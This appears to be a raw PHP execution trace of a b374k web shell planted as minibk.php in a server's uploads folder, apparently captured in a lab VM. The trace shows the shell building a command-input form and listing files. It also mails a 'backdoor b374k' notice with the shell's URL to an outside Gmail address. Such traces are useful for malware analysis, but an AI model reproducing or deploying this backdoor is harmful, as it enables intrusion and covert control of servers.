4 69 R 6
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $tree = 6
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $parent = ''
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
4 70 0 0.008829 697408 error_reporting 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 70 1 0.008844 697448
4 70 R 0
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $sub = 'backdoor b374k'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $headers = 'From: k3nz0 \n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mes .= 'username: ????:????\n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mes .= 'password: \n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mes .= 'URL: /uploads/minibk.php\n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mes .= 'Referer: '
4 71 0 0.008993 697600 mail 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 4 'free.d0ing.1987@gmail.com' 'backdoor b374k' 'username: ????:????\npassword: \nURL: /uploads/minibk.php\nReferer: ' 'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
4 71 1 0.010047 697744
4 71 R FALSE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i = 0
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $parent .= '/'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $parent .= 'var/'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $parent .= 'www/'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $parent .= 'html/'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
4 72 0 0.010183 697640 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.'
4 72 1 0.010204 697672
4 72 R 0
4 73 0 0.010218 697632 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 73 1 0.010255 698432
4 73 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 74 0 0.010301 698400 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.'
4 74 1 0.010315 698440
4 74 R 0
4 75 0 0.010328 698400 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 75 1 0.010356 699056
4 75 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 76 0 0.010417 699280 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 0 0.010433 699280 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
5 77 1 0.010451 699336
5 77 R 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 76 1 0.010574 699336
4 76 R 'rwxrwxrwx'
4 78 0 0.010589 699328 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 78 1 0.010604 699368
4 78 R 1676242137
4 79 0 0.010617 699328 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 79 1 0.010688 701720
4 79 R '12-Feb-2023 17:48'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 17:48</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
4 80 0 0.010739 701936 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '..'
4 80 1 0.010757 701960
4 80 R 0
4 81 0 0.010769 701920 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 81 1 0.010797 702720
4 81 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 82 0 0.010839 701920 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '..'
4 82 1 0.010853 701960
4 82 R 0
4 83 0 0.010866 701920 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 83 1 0.010889 702576
4 83 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 84 0 0.010942 702112 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 0 0.010956 702112 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/'
5 85 1 0.010972 702160
5 85 R 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 84 1 0.011111 702160
4 84 R 'rwxrwxrwx'
4 86 0 0.011126 702152 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/'
4 86 1 0.011141 702192
4 86 R 1676242137
4 87 0 0.011155 702152 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 87 1 0.011189 702480
4 87 R '12-Feb-2023 17:48'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 17:48</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
4 88 0 0.011233 702440 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
4 88 1 0.011254 702472
4 88 R 0
4 89 0 0.011270 702432 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 89 1 0.011305 703232
4 89 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 90 0 0.011361 702432 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
4 90 1 0.011380 702472
4 90 R 0
4 91 0 0.011398 702432 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 91 1 0.011429 703088
4 91 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 92 0 0.011498 702432 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 93 0 0.011518 702432 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 93 1 0.011539 702528
5 93 R 'data'
4 92 1 0.011558 702432
4 92 R 'data'
4 94 0 0.011579 702624 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 95 0 0.011596 702624 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 95 1 0.011617 702720
5 95 R 'data'
4 94 1 0.011635 702624
4 94 R 'data'
4 96 0 0.011654 703072 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 97 0 0.011672 703072 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 97 1 0.011692 703168
5 97 R 'data'
4 96 1 0.011711 703072
4 96 R 'data'
4 98 0 0.011730 703072 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 99 0 0.011747 703072 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 99 1 0.011766 703168
5 99 R 'data'
4 98 1 0.011784 703072
4 98 R 'data'
4 100 0 0.011803 703256 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 0 0.011822 703256 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
5 101 1 0.011847 703320
5 101 R 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 16895
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'x'
4 100 1 0.012026 703320
4 100 R 'rwxrwxrwx'
4 102 0 0.012047 703224 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
4 102 1 0.012069 703240
4 102 R 1676242137
4 103 0 0.012088 703200 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 103 1 0.012131 703528
4 103 R '12-Feb-2023 17:48'
4 104 0 0.012153 703200 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 105 0 0.012172 703200 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 105 1 0.012192 703296
5 105 R 'data'
4 104 1 0.012211 703200
4 104 R 'data'
4 106 0 0.012229 703328 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
5 107 0 0.012248 703328 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'data'
5 107 1 0.012267 703424
5 107 R 'data'
4 106 1 0.012286 703328
4 106 R 'data'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/.htaccess'
4 108 0 0.012359 704024 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
4 108 1 0.012381 704072
4 108 R 0
4 109 0 0.012399 704032 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 109 1 0.012433 704832
4 109 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 110 0 0.012491 704032 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
4 110 1 0.012511 704072
4 110 R 0
4 111 0 0.012528 704032 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 111 1 0.012559 704688
4 111 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 112 0 0.012628 704032 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 113 0 0.012647 704032 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 113 1 0.012668 704128
5 113 R '.htaccess'
4 112 1 0.012688 704032
4 112 R '.htaccess'
4 114 0 0.012708 704256 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 115 0 0.012727 704256 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 115 1 0.012745 704352
5 115 R '.htaccess'
4 114 1 0.012759 704256
4 114 R '.htaccess'
4 116 0 0.012773 704672 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 117 0 0.012786 704672 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 117 1 0.012801 704768
5 117 R '.htaccess'
4 116 1 0.012815 704672
4 116 R '.htaccess'
4 118 0 0.012871 704672 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 119 0 0.012885 704672 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 119 1 0.012905 704768
5 119 R '.htaccess'
4 118 1 0.012919 704672
4 118 R '.htaccess'
4 120 0 0.012932 704800 ukuran 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 0 0.012946 704800 filesize 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 121 1 0.012964 704856
5 121 R 64
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $size = 64
4 120 1 0.012989 704816
4 120 R 64
4 122 0 0.013003 704816 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 0 0.013017 704816 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 123 1 0.013031 704856
5 123 R 33188
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 33188
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 122 1 0.013151 704856
4 122 R 'rw-r--r--'
4 124 0 0.013166 704944 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
4 124 1 0.013180 704984
4 124 R 1676242137
4 125 0 0.013193 704944 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 125 1 0.013225 705272
4 125 R '12-Feb-2023 17:48'
4 126 0 0.013241 705072 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 127 0 0.013254 705072 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 127 1 0.013269 705168
5 127 R '.htaccess'
4 126 1 0.013283 705072
4 126 R '.htaccess'
4 128 0 0.013297 705072 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
5 129 0 0.013310 705072 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
5 129 1 0.013324 705168
5 129 R '.htaccess'
4 128 1 0.013337 705072
4 128 R '.htaccess'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/minibk.php'
4 130 0 0.013390 708152 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
4 130 1 0.013407 708176
4 130 R 1000
4 131 0 0.013420 708136 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 1000
4 131 1 0.013454 708952
4 131 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4 132 0 0.013499 708152 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
4 132 1 0.013513 708192
4 132 R 1000
4 133 0 0.013526 708152 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 1000
4 133 1 0.013559 708808
4 133 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'osboxes<span class="gaya"> : </span>osboxes'
4 134 0 0.013614 708168 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 135 0 0.013628 708168 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 135 1 0.013644 708264
5 135 R 'minibk.php'
4 134 1 0.013658 708168
4 134 R 'minibk.php'
4 136 0 0.013672 708392 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 137 0 0.013686 708392 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 137 1 0.013701 708488
5 137 R 'minibk.php'
4 136 1 0.013716 708392
4 136 R 'minibk.php'
4 138 0 0.013729 708808 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 139 0 0.013743 708808 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 139 1 0.013758 708904
5 139 R 'minibk.php'
4 138 1 0.013771 708808
4 138 R 'minibk.php'
4 140 0 0.013784 708808 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 141 0 0.013797 708808 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 141 1 0.013812 708904
5 141 R 'minibk.php'
4 140 1 0.013825 708808
4 140 R 'minibk.php'
4 142 0 0.013839 708936 ukuran 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/minibk.php'
5 143 0 0.013853 708936 filesize 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/minibk.php'
5 143 1 0.013869 709000
5 143 R 14621
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $size = 14621
5 144 0 0.013896 708960 round 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 14.2783203125 2
5 144 1 0.013912 709032
5 144 R 14.28
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $size = 14.28
4 142 1 0.013939 709000
4 142 R '14.28 kb'
4 145 0 0.013954 708960 get_perms 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/minibk.php'
5 146 0 0.013968 708960 fileperms 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/minibk.php'
5 146 1 0.013982 709000
5 146 R 33204
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $mode = 33204
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $perms .= '-'
4 145 1 0.014103 709000
4 145 R 'rw-rw-r--'
4 147 0 0.014117 709088 filemtime 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/minibk.php'
4 147 1 0.014131 709128
4 147 R 1676242137
4 148 0 0.014144 709088 date 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242137
4 148 1 0.014176 709416
4 148 R '12-Feb-2023 17:48'
4 149 0 0.014191 709216 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 150 0 0.014204 709216 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 150 1 0.014220 709312
5 150 R 'minibk.php'
4 149 1 0.014234 709216
4 149 R 'minibk.php'
4 151 0 0.014247 709216 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
5 152 0 0.014265 709216 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'minibk.php'
5 152 1 0.014280 709312
5 152 R 'minibk.php'
4 151 1 0.014294 709216
4 151 R 'minibk.php'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="minibk.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/minibk.php">minibk.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="minibk.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="minibk.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="minibk.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="input'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $full = '/var/www/html/uploads/prepend.php'
4 153 0 0.014346 708192 fileowner 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
4 153 1 0.014363 708208
4 153 R 0
4 154 0 0.014376 708168 posix_getpwuid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 154 1 0.014400 708968
4 154 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 155 0 0.014443 708152 filegroup 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
4 155 1 0.014457 708192
4 155 R 0
4 156 0 0.014470 708152 posix_getgrgid 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 0
4 156 1 0.014492 708808
4 156 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
4 157 0 0.014542 708136 clearspace 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
5 158 0 0.014556 708136 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
5 158 1 0.014571 708232
5 158 R 'prepend.php'
4 157 1 0.014585 708136
4 157 R 'prepend.php'
